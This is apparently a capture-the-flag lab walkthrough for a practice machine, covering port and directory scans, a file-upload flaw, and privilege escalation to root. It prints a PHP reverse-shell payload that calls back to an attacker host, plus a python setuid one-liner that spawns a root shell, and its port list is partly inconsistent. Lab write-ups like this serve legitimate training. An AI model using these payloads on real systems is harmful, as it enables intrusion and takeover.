Machine IP →
Nmap scan →
nmap -A -Pn -p- -T4 -o nmap.txt 192.168.51.83
OS Detection →
OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|Port||Service||Other details (if any)|
|22||SSH||OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)|
|80||HTTP||Apache httpd 2.4.38 ((Debian))|
Therefore, a bunch of ports are open for http → 80, 7080, 8088, 8715, ftp on port 21 and ssh on port 22.
GoBuster scan →
gobuster dir -u http://192.168.51.83 -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt
The result for the port 7080 revealed nothing. The scan for port 80 resulted in the following finds →
- ebook/ (301)
- server-status (403)
Directories/files listed for port 8088 →
- cgi-bin/ (301)
- img/ (301)
- docs/ (301)
- css/ (301)
- protected/ (301)
- blocked/ (301)
The scan for the port 8715 revealed nothing.
Looking at the status codes
200 for the enumeration of port 8088, there are two files
upload.php. These are connected and are an upload capability. Uploading a file on the port 8088 website allows for the file to be accessed on a different web server. This web server is that running on port 8715. However, after testing txt and php files, php files are accessible while txt files need a password. Therefore, a php file can be used to create a reverse shell. Used the following php payload for the reverse shell →
1 2 3 <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.49.187/3002 0>&1'"); ?>
A good resource for a reverse shell is Pentest Monkey PHP reverse shell.
The reverse shell, therefore is the
www-data user on the machine. This gives the user flag. Checked sudo capabilities for the user, but there were none. Search for setuid binaries did not give any results as well.
The next checks are to be made for capabilities. Used
getcap -r / 2>/dev/null to list files with capabilities set. The result includes the entry →
/usr/bin/python2.7 = cap_setuid+ep.
Therefore, the following python code can be invoked using the said binary to elevate privileges →
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'. This gives the root flag.